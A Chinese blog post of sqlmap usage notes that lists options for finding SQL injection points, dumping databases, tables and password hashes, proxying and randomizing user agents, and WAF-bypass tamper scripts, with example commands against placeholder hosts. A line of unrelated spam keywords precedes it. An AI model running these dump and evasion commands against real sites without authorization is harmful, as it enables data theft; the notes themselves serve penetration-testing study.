书店商城网站设计,附近图文广告公司电话,安阳区号电话,安卓是哪个公司开发的【Web安全】sqlmap的使用笔记 文章目录 【Web安全】sqlmap的使用笔记1. 目标2. 脱库2.1. 脱库#xff08;补充#xff09; 3. 其他3.1. 其他#xff08;补充#xff09; 4. 绕过脚本tamper讲解 1. 目标
操作作用必要示例-u指定URL#xff0c;检测注入点sqlmap -u http://…【Web安全】sqlmap的使用笔记 文章目录 【Web安全】sqlmap的使用笔记1. 目标2. 脱库2.1. 脱库补充 3. 其他3.1. 其他补充 4. 绕过脚本tamper讲解 1. 目标
操作作用必要示例-u指定URL检测注入点sqlmap -u http://example.com/?id1-m指定txt里面有很多个URLsqlmap -m urls.txt-r检测POST请求的注入点使用BP等工具抓包将http请求内容保存到txt文件中sqlmap -r request.txt–cookie指定cookie的值单/双引号包裹sqlmap -u http://example.com?idx --cookie session_id1234-D指定数据库sqlmap -u http://example.com/?id1 -D mydatabase-T指定表sqlmap -u http://example.com/?id1 -D mydatabase -T mytable-C指定字段sqlmap -u http://example.com/?id1 -D mydatabase -T mytable -C mycolumn
2. 脱库
操作作用必要示例-b获取数据库版本sqlmap -u url -b–current-db当前数据库sqlmap -u url --current-db–dbs获取数据库sqlmap -u url --dbs–tables获取表sqlmap -u url --tables -D database–columns获取字段sqlmap -u url --columns -D database -T table–schema字段类型sqlmap -u url --schema -D database–dump获取数据sqlmap -u url --dump -D database -T table–start开始的行sqlmap -u url --start1 -D database -T table–stop结束的行sqlmap -u url --stop10 -D database -T table–search搜索库表字段sqlmap -u url --search -C column–tamperWAF绕过sqlmap -u url --tampertamper_script
2.1. 脱库补充
–current-db获取的是当前的数据库名称而–dbs获取的是所有的数据库名称WAF 指的是“Web Application Firewall”即网络应用防火墙例如sqlmap -u ‘http://xx/?id1’ --tamper ‘space2comment.py’sqlmap有很多内置的绕过脚本(脚本按照用途命名)在/usr/share/sqlmap/tamper/目录下–search如果你正在寻找包含特定关键字的列这个命令将列出所有包含该关键字的列的名称及其所属的表和数据库。
3. 其他
操作作用必要示例–batch不再询问确认sqlmap -u http://example.com/?id1 --batch–methodGET指定请求方式sqlmap -u http://example.com/?id1 --methodGET–random-agent随机UAsqlmap -u http://example.com/?id1 --random-agent–user-agent自定义UAsqlmap -u http://example.com/?id1 --user-agent MyUserAgent–referer自定义referersqlmap -u http://example.com/?id1 --referer http://referer.com–proxy“123”代理sqlmap -u http://example.com/?id1 --proxyhttp://123.123.123.123:8080–threads 10线程数1~10sqlmap -u http://example.com/?id1 --threads 10–level1测试等级1~5sqlmap -u http://example.com/?id1 --level1–risk1风险等级0~3sqlmap -u http://example.com/?id1 --risk1
3.1. 其他补充
测试等级这个等级决定了 SQLMap 将尝试的测试数量和类型。较高的等级意味着 SQLMap 将执行更多类型的测试这些测试可能更复杂有时也更具侵入性。例如在较低的等级上SQLMap 可能只测试最常见的注入类型而在较高等级上它会尝试更多不常见的或复杂的注入技术。风险等级风险等级影响测试的侵入性。较高的风险等级可能会运行更具侵入性的测试这些测试可能会对数据库造成更大的负担或风险。例如一些高风险测试可能包括执行实际的数据库操作如更新或删除数据而低风险测试则尽量避免这种潜在的破坏性操作。
操作作用必要示例-a自动识别和测试所有参数sqlmap -u http://example.com/?id1 -a–current-user获取当前数据库用户sqlmap -u http://example.com/?id1 --current-user–is-dba是不是数据库管理员sqlmap -u http://example.com/?id1 --is-dbs–users枚举数据库服务器上的用户sqlmap -u http://example.com/?id1 --users–privileges枚举数据库用户的权限sqlmap -u http://example.com/?id1 --privileges–passwords尝试获取数据库用户的密码sqlmap -u http://example.com/?id1 --passwords–hostname获取数据库服务器的主机名sqlmap -u http://example.com/?id1 --hostname–statements捕获并显示SQL语句sqlmap -u http://example.com/?id1 --statements
4. 绕过脚本tamper讲解
sqlmap在默认情况下除了使用CHAR()函数防止出现单引号没有对注入的数据进行修改我们还可以使用–tamper参数对数据进行修改来绕过WAF等设备其中部分脚本主要用正则模块替换攻击载荷字符编码的方式尝试绕过WAF的检测规则
sqlmap XXXXX --tamper 模块名sqlmap内置了53个脚本其中常见的是
apostrophemask.py将引号替换为UTF-8字符用于过滤单引号base64encode.py替换为base64编码multiplespaces.py围绕SQL关键字添加多个空格space2plus用号替换空格nonrecursivereplacement.py作为双重查询语句用双重查询代替预定义的SQL关键字使适用于非常弱的自定义过滤器例如将SELECT替换为空space2randomblank.py将空格替换为其他的有效字符unionalltounion.py将UNION ALL SELECT替换为UNION SELECTsecuresphere.py追加特制的字符串space2hash.py将空格替换为#号并添加一个随机字符串和换行符space2mssqlblank.py(mssql)将空格替换为其他空符号space2mssqlhash.py将空格替换为#号并添加一个换行符
